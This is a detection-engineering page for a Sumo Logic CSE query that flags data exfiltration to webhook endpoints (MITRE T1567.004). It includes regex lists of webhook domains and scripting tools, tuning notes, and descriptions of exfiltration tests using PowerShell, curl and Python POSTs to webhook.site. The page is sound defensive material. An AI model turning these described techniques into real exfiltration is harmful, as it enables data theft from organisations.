Detect Exfiltration Over Webhook in Sumo Logic CSE
Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple HTTP/S push mechanisms supported by collaboration platforms such as Discord, Slack, Microsoft Teams, and generic services like webhook.site. Adversaries exploit these endpoints by either linking an adversary-controlled webhook to a victim-owned SaaS service for automated repeated exfiltration of emails or chat messages, or by manually posting staged data directly to a webhook URL via scripting tools. Because webhook traffic is HTTPS and destined for widely-trusted SaaS domains, it blends with normal enterprise traffic and often bypasses data loss prevention controls. Observed real-world usage includes Discord webhooks for credential and token exfiltration from malicious npm packages, Slack webhooks used by insider threats, and Microsoft Teams webhooks abused via SQL Server xp_cmdshell lateral movement chains.
MITRE ATT&CK
- Tactic
- Exfiltration
- Technique
- T1567 Exfiltration Over Web Service
- Sub-technique
- T1567.004 Exfiltration Over Webhook
- Canonical reference
- https://attack.mitre.org/techniques/T1567/004/
Sumo Detection Query
(_sourceCategory="windows/sysmon" OR _sourceCategory="endpoint/process" OR _sourceCategory="proxy/web")
| where _raw matches "(?i)(discord\.com/api/webhooks|hooks\.slack\.com/services|webhook\.site|webhooks\.site|outlook\.office\.com/webhook|outlook\.office365\.com/webhook|pipedream\.net|requestbin\.com|requestcatcher\.com|hookbin\.com|beeceptor\.com|smee\.io|ntfy\.sh|pushover\.net)"
| parse regex field=_raw "(?i)(?:Image|process_name|Process)[\s=:\"]+(?P<ProcessName>[^\s\"\|,]+)" nodrop
| parse regex field=_raw "(?i)(?:CommandLine|command_line|cmdline)[\s=:\"]+(?P<CommandLine>[^\|\n]{0,512})" nodrop
| parse regex field=_raw "(?i)(?:DestinationHostname|dest_hostname|cs-host|url)[\s=:\"]+(?P<WebhookTarget>[^\s\"\|,]+)" nodrop
| parse regex field=_raw "(?i)(?:BytesSent|bytes_out|sc-bytes)[\s=:\"]+(?P<BytesSentStr>[0-9]+)" nodrop
| parse regex field=_raw "(?i)(?:User|username|AccountName)[\s=:\"]+(?P<UserName>[^\s\"\|,]+)" nodrop
| parse regex field=_raw "(?i)(?:hostname|ComputerName|host)[\s=:\"]+(?P<Hostname>[^\s\"\|,]+)" nodrop
| num(BytesSentStr) as BytesSent
| eval SuspiciousProcess = if(ProcessName matches "(?i)(powershell\.exe|pwsh\.exe|cmd\.exe|python\.exe|python3|node\.exe|curl\.exe|wget\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|certutil\.exe|bitsadmin\.exe)", 1, 0)
| eval LargeTransfer = if(BytesSent > 1048576, 1, 0)
| eval WebhookCmdLine = if(CommandLine matches "(?i)(discord\.com/api/webhooks|hooks\.slack\.com|webhook\.site|pipedream\.net|ntfy\.sh)", 1, 0)
| eval SignalType = if(SuspiciousProcess = 1 and LargeTransfer = 1, "SuspiciousProcessLargeTransfer",
if(SuspiciousProcess = 1, "SuspiciousProcessWebhookConn",
if(WebhookCmdLine = 1, "WebhookInCommandLine",
if(LargeTransfer = 1, "LargeTransferToWebhook", "WebhookContact"))))
| stats
count as EventCount,
sum(BytesSent) as TotalBytesSent,
values(SignalType) as Signals,
values(WebhookTarget) as WebhookTargets,
values(CommandLine) as CommandLines,
min(_messageTime) as FirstSeen,
max(_messageTime) as LastSeen
by Hostname, UserName, ProcessName
| where EventCount > 0
| eval Priority = if(TotalBytesSent > 1048576, "HIGH", if(EventCount > 5, "HIGH", "MEDIUM"))
| sort by TotalBytesSent desc, EventCount descSumo Logic CSE query detecting exfiltration over webhook endpoints by parsing Sysmon process and network events alongside proxy logs. The detection extracts process names, command lines, destination hostnames, and bytes sent fields to identify suspicious processes connecting to known webhook domains. Signals are classified by type: suspicious process with large transfer (>1MB), suspicious process webhook connection, webhook URL in command line, or any large outbound transfer to a webhook endpoint. Priority is escalated to HIGH for transfers exceeding 1MB or more than 5 events per host/user/process combination.
Data Sources
Required Tables
False Positives & Tuning
- Slack or Teams bots running as services under scripting runtimes (Python, Node.js) that periodically post status updates to incoming webhooks configured by IT or operations teams.
- Developer machines running test scripts against webhook.site, requestbin.com, or pipedream.net for HTTP integration testing during normal development workflows.
- Security orchestration tools (SOAR platforms) using curl or Python SDKs to forward incident notifications to Slack or Teams channels via webhook URLs.
Other platforms for T1567.004
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Exfiltrate Data via Discord Webhook using PowerShell
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-RestMethod' and 'webhook.site'. Sysmon Event ID 3: Network Connection from powershell.exe to webhook.site on port 443. DeviceNetworkEvents: RemoteUrl containing webhook.site, InitiatingProcessFileName=powershell.exe, BytesSent > 0.
- Test 2Exfiltrate File Contents via curl to Webhook Endpoint
Expected signal: Sysmon Event ID 1: Process Create for cmd.exe (echo/type) and curl.exe with CommandLine containing 'webhook.site' and '-X POST'. Sysmon Event ID 11: File Create for the staging file in %TEMP%. Sysmon Event ID 3: Network Connection from curl.exe to webhook.site on port 443. DeviceNetworkEvents: InitiatingProcessFileName=curl.exe, RemoteUrl containing webhook.site.
- Test 3Python Requests Library Webhook Exfiltration
Expected signal: Sysmon Event ID 1: Process Create with Image=python.exe, CommandLine containing 'urllib.request', 'webhook.site', and 'POST'. Sysmon Event ID 3: Network Connection from python.exe to webhook.site on port 443. DeviceNetworkEvents: InitiatingProcessFileName=python.exe, RemoteUrl=webhook.site.
- Test 4Automated SaaS Webhook Exfiltration via Microsoft Teams Incoming Webhook
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-WebRequest' and 'outlook.office.com/webhook'. Sysmon Event ID 3: Network Connection from powershell.exe to outlook.office.com on port 443. DeviceNetworkEvents: RemoteUrl containing /webhook/, InitiatingProcessFileName=powershell.exe.
References (11)
- https://attack.mitre.org/techniques/T1567/004/
- https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191
- https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord
- https://blog.talosintelligence.com/collab-app-abuse/
- https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md
- https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/
- https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
- https://www.redhat.com/en/topics/automation/what-is-a-webhook
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.004/T1567.004.md
Unlock Pro Content
Get the full detection package for T1567.004 including response playbook, investigation guide, and atomic red team tests.